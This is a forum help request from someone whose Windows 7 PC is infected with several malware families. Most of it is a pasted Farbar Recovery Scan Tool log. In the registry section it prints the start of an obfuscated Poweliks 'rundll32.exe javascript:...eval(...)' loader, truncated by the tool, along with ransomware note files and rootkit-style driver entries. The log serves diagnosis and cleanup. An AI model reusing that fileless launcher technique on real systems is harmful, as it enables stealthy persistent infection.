
Unknown malware related to viruses (?)


  • This topic is locked
12 replies to this topic

#1 tantryl


Posted 10 September 2014 - 05:19 AM

The only obvious symptom was that the security settings in IE were modified in a way that prevented downloading most things.
 
JRT and ADWCleaner found little. MBAM and MBAR found a few things and removed/quarantined them but it's clear by HJT & Farbar scans that remnants remain. Removing things with HJT does nothing, they're still there on subsequent scans.
 
MSE found and removed a bunch of stuff starting 4 days ago and ending yesterday after I ran the above - Trojan:Win32/Qadars.A, Exploit:HTML/Pangimop.V, Behaviour:Win32/Crowti.A, Behaviour:Win32/Crowti.C, Behaviour:Win32/Vawtrak.A, Backdoor:Win32/Vawtrak.F, Trojan:Win32/Powessere.A, PWS:Win32/Zbot.gen!AP, Ransom:Win32/Crowti.A, Trojan:Win32/Qadars and Trojan:Win32/Ropest.G. Running MSE now reveals nothing, neither does aswmbr.
 
Win7 Sp1 needs to be installed along with a newer version of Reader and probably a couple of other things I haven't noticed but I figure taking care of this is the first priority.
 
I would appreciate any help.
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 07-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 10-09-2014 17:35:03
Running from C:\Users\hesperia\Downloads
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Adobe Systems Incorporated) C:\Config.Msi\17e72.rbf
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Desktop.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\tv_w32.exe
(Adobe Systems Incorporated) C:\Config.Msi\17e3f.rbf
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [951576 2014-03-11] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [37296 2012-01-03] (Adobe Systems Incorporated)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_17-windows-i586.cab
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} http://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.4.24.0.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22216 2014-03-11] (Microsoft Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [279776 2014-03-11] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [231960 2014-01-25] (Microsoft Corporation)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:25 - 2014-09-09 15:26 - 00034865 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-10 17:38 - 00012878 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:24 - 2014-09-10 17:35 - 00000000 ____D () C:\FRST
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 15:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:56 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:40 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-07 18:51 - 2014-09-09 08:14 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Awyhvya
2014-09-07 13:42 - 2014-09-07 18:11 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Usleabo
2014-09-07 13:29 - 2014-09-07 13:29 - 00006144 __RSH () C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
2014-09-07 09:40 - 2014-09-07 09:40 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-07 09:40 - 2014-09-07 09:40 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-07 09:40 - 2014-09-07 09:40 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-07 09:22 - 2014-09-07 09:22 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\sRaiGGih
2014-08-14 07:42 - 2014-08-07 09:35 - 00410112 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-08-14 07:42 - 2014-08-07 09:32 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-10 17:38 - 2014-09-09 15:24 - 00012878 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-10 17:37 - 2010-11-03 08:45 - 01454983 _____ () C:\windows\WindowsUpdate.log
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-10 17:32 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-10 17:31 - 2010-12-19 11:01 - 00683950 _____ () C:\windows\PFRO.log
2014-09-10 17:31 - 2009-07-14 12:39 - 00143247 _____ () C:\windows\setupact.log
2014-09-10 16:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 23:10 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
2014-09-09 15:26 - 2014-09-09 15:25 - 00034865 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:18 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-09 15:18 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 15:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:59 - 2011-04-29 10:03 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamswissarmy.sys
2014-09-09 14:56 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-09 08:14 - 2014-09-07 18:51 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Awyhvya
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 18:11 - 2014-09-07 13:42 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\Usleabo
2014-09-07 13:29 - 2014-09-07 13:29 - 00006144 __RSH () C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-07 09:40 - 2014-09-07 09:40 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-07 09:40 - 2014-09-07 09:40 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-07 09:40 - 2014-09-07 09:40 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-07 09:40 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-07 09:40 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-07 09:40 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-07 09:22 - 2014-09-07 09:22 - 00000000 ____D () C:\Users\hesperia\AppData\Roaming\sRaiGGih
2014-08-14 08:09 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-14 08:07 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
 
Some content of TEMP:
====================
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 07-09-2014
Ran by hesperia at 2014-09-10 17:38:48
Running from C:\Users\hesperia\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Disabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
